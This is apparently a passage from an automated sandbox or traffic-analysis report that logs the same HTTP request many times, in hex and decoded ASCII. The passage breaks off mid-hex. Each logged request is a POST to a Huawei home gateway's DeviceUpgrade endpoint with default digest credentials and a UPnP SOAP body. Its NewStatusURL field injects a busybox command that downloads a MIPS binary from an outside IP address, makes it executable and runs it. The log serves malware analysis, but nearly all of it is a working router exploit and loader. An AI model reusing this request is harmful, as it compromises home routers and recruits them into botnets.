6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 